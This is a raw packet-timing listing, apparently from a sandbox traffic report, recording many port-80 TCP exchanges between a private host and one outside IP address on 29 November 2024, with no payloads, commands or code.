                                                                                Nov 29, 2024 01:52:39.390233994 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.390315056 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.390439034 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.390506983 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.390568018 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.390592098 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.510322094 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510624886 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510664940 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510674000 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510720968 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510729074 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.510768890 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510785103 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.510811090 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.510829926 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510855913 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510902882 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.510953903 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.510977030 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.511018991 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.511023045 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.511059999 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.511110067 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.630825996 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.630836010 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.630887985 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.630930901 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.630979061 CET804978472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.630987883 CET4978480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.909403086 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.953507900 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.954478979 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.073537111 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.073645115 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.117522955 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.117598057 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.237514019 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.325596094 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.325668097 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.577593088 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.578135014 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.600456953 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.602440119 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.653364897 CET804979172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.654434919 CET4979180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.654484987 CET4979180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.698156118 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722619057 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722632885 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722709894 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722718954 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722801924 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722835064 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722959995 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.769346952 CET4979380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.774518967 CET804979172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.821227074 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.821294069 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.821372986 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.889324903 CET804979372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.889389992 CET4979380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.889520884 CET4979380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.941524029 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.968530893 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.009412050 CET804979372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.088577032 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.088663101 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.088804007 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.088917017 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.089009047 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.089025974 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.208978891 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209000111 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209008932 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209086895 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209110022 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209141016 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209156036 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209160089 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209165096 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209217072 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209264040 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209280014 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209311008 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209323883 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209387064 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209403038 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209434986 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209443092 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209444046 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209491014 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.329233885 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.329252958 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.329354048 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.329397917 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.329397917 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.329416037 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.329454899 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.373712063 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.373795986 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.493550062 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.493635893 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.537601948 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.537673950 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.657550097 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.745611906 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.745656967 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.993654966 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.993707895 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.027318954 CET804979372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.027380943 CET4979380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.027419090 CET4979380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.043198109 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.043273926 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.113678932 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.144347906 CET4979580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.147509098 CET804979372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163285017 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163295984 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163371086 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163403988 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163497925 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163506031 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163589001 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.264324903 CET804979572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.264401913 CET4979580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.264528036 CET4979580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.272908926 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.272963047 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.272984982 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.384785891 CET804979572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.392900944 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.523617029 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.643708944 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.643776894 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.643878937 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.643923044 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.643990040 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.644011021 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764162064 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764175892 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764185905 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764202118 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764209986 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764245987 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764254093 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764269114 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764309883 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764312983 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764341116 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764358997 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764388084 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764439106 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764447927 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764456034 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764496088 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764511108 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.884401083 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.884416103 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.884424925 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.884429932 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.884488106 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.884519100 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.925566912 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.925688982 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.045567036 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.050472021 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.093575001 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.093908072 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.213680983 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.301539898 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.301609993 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.495009899 CET804979572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.498486996 CET4979580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.498586893 CET4979580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.549650908 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.550456047 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.561347008 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.562459946 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.613429070 CET4979780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.618522882 CET804979572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.670423031 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682544947 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682590961 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682647943 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682676077 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682765961 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682816029 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682920933 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.733382940 CET804979772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.733488083 CET4979780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.733674049 CET4979780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.781579971 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.781660080 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.781790972 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.853552103 CET804979772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.901935101 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.956073999 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.076039076 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.076231956 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.076442003 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.076653004 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.076750994 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.076837063 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.196419001 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196716070 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196724892 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196732998 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196789980 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.196814060 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196819067 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.196822882 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196870089 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.196914911 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196969032 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.197035074 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.197052956 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.197088003 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.197094917 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.197097063 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.197143078 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.497863054 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.497914076 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.617743015 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.617753983 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.617789030 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.617830992 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.617840052 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.617892027 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.661550999 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.664544106 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.734934092 CET804980672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.737832069 CET4980680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.740112066 CET4980680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.781635046 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.781749010 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.825683117 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.825759888 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.860033989 CET804980672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.871320009 CET4980980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:55.945700884 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.991463900 CET804980972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:55.991535902 CET4980980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.008167028 CET4980980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.037568092 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.038500071 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.128424883 CET804980972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.289621115 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.289683104 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.368863106 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.368962049 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.409827948 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489003897 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489013910 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489135027 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489217043 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489224911 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489290953 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.489304066 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.607901096 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.607974052 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.609394073 CET4980880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.729347944 CET804980872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.845982075 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.965866089 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:56.965943098 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.966182947 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.966233969 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.966339111 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:56.966414928 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.086314917 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086333036 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086343050 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086420059 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.086468935 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086477995 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086504936 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086556911 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.086570978 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086644888 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086653948 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086677074 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.086709023 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.086823940 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086867094 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086875916 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.086929083 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.130007029 CET804980972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.130059958 CET4980980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.138895035 CET4980980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.206401110 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.206456900 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.206490993 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.206502914 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.206554890 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.206593990 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.206643105 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.249520063 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.249609947 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.249650955 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.257900000 CET4981680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.258738995 CET804980972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.369539022 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.369683027 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.377980947 CET804981672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.378050089 CET4981680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.378237009 CET4981680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.413584948 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.413701057 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.498155117 CET804981672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.533648968 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.535109997 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.697585106 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.700772047 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.901583910 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.901670933 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:57.957139015 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:57.957223892 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.021635056 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078257084 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078418970 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078541040 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078551054 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078558922 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.078567982 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.196140051 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.196203947 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.196280003 CET4981080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.316155910 CET804981072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.426841021 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.546736956 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.548722982 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.548974037 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.549088955 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.549156904 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.549177885 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.608347893 CET804981672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:58.608525038 CET4981680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:58.608525038 CET4981680192.168.2.472.52.178.23
